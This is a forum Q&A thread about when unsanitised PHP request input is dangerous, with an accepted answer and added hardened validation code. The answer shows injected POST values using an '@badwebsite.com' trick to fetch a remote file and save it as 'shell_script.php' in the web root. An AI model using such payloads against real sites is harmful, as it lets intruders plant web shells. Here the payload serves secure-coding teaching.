doumaojin4008 2015-02-06 11:50
Views: 93
Accepted

PHP vulnerabilities (XSS, ...) > When does user input / URL injection actually cause harm?

Hope this question is not too unspecific, so...

My question is, when do I actually have to pay attention to how I handle vulnerable variables and when do I not? E.g. it's obviously insecure to use something like ...

echo $_POST['username']; // insecure !!!

in your template. $_GET and $_SERVER variables are said to be vulnerable as well. So I'll have to sanitize them before 'using' them. But what does 'use' mean in this context? Insecure would be, e.g., to output them with echo, to write them unfiltered into a DB, or to put them in any other open context. On the other hand, comparing them with other variables like in ...

if ($_SESSION['username'] === $_POST['username']) {};

or embedding them into a variable like ...

$file = 'http://www.example.com/users/' . $_POST['username']; // insecure !!! see Tom's answer

and then checking ...

if (file_exists($file)) {};

..., in other words keeping them in a somehow closed context is secure, isn't it? (It seems to me that the $file example could be considered borderline in terms of security, but used that way, I think it's ok?) Maybe someone also knows of cases in which the distinction between open and closed context is not as clear (as I hope it is in my examples), to draw attention to them.

Thank you


2 answers

  • doubo82706 2015-02-06 12:05

    It depends on what you're going to do with that file. The username field can pass something that would point you to a file not on that website like:

    $_POST['username'] = '@not-the-site-you-want.com/bad_stuff.html';
    $file = 'http://www.example.com' . $_POST['username'];
    

    This will resolve to http://not-the-site-you-want.com/bad_stuff.html and will still return true for file_exists($file);.

    Let's try a "real world" example of why you don't want to just inject $_POST variables and then trust the results.

    Let's say we're going to retrieve a user's picture from an online source (like this one: http://www.gravatar.com/avatar/205e460b479e2e5b48aec07710c08d50) and store it locally:

    $username = $_POST['username'];
    // We expect 'hash' to contain '/avatar/205e460b479e2e5b48aec07710c08d50'
    // See @SilverlightFox's comments below for more information.
    $image = 'http://www.gravatar.com' . $_POST['hash'];
    // Both the remote URL and the local file name come straight from the request.
    if (file_exists($image)) {
        // Now we have the image stored on our local system
        copy($image, 'assets/' . $username);
    }
    

    User provides the following information:

    $_POST['username'] = 'shell_script.php';
    $_POST['hash'] = '@badwebsite.com/shell_script.txt';
    

    You've now just uploaded a shell script to your website that will be accessible at http://www.mywebsite.com/assets/shell_script.php

    Half of security is knowing the basics and putting in restrictions. The other half is figuring out how someone could get around the restrictions you've put in place. Your code could be immune to SQL injection and XSS, but if you pass an is_admin flag as a parameter in each page request and honour it, then someone is going to find it and abuse it.

    This answer was accepted by the asker.
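A hardened version of the avatar-fetch snippet from the answer above, added here as an example (it is not code from the question or the answer; the function names are assumptions). The server fixes the scheme, host, path prefix and file extension, and the two request values are validated against strict patterns before they are used anywhere.

```php
<?php
// Added example, not code from the question or the answer.
// Function names are assumptions.
declare(strict_types=1);

// A Gravatar hash is exactly 32 hex characters. Anchoring with \A and \z
// rejects the "@badwebsite.com/shell_script.txt" payload: no '@', '/',
// ':' or '.' can ever pass, so the host part of the URL stays fixed.
function validAvatarHash(string $hash): bool
{
    return preg_match('/\A[a-f0-9]{32}\z/', $hash) === 1;
}

// Restrict usernames to a safe character set so they cannot carry a path
// separator or choose their own file extension.
function validUsername(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $name) === 1;
}

// The server, not the request, decides scheme, host and path prefix.
function avatarUrl(string $hash): string
{
    if (!validAvatarHash($hash)) {
        throw new InvalidArgumentException('invalid avatar hash');
    }
    return 'https://www.gravatar.com/avatar/' . $hash;
}

// The server also decides the extension, so the stored file can never be
// named "shell_script.php" whatever the username field contains.
function localAvatarPath(string $username, string $assetsDir = 'assets'): string
{
    if (!validUsername($username)) {
        throw new InvalidArgumentException('invalid username');
    }
    return $assetsDir . '/' . $username . '.png';
}

// Fetch only after both inputs are validated. copy() follows http(s)
// stream wrappers when allow_url_fopen is enabled.
function storeAvatar(string $username, string $hash): bool
{
    return copy(avatarUrl($hash), localAvatarPath($username));
}

// Constructed input modelled on the answer's payload; both validators reject it.
var_dump(validUsername('shell_script.php'));
var_dump(validAvatarHash('@badwebsite.com/shell_script.txt'));
```

Checking the downloaded bytes with getimagesize() before serving them adds a second layer, since the remote host is trusted only as far as the fixed URL prefix reaches.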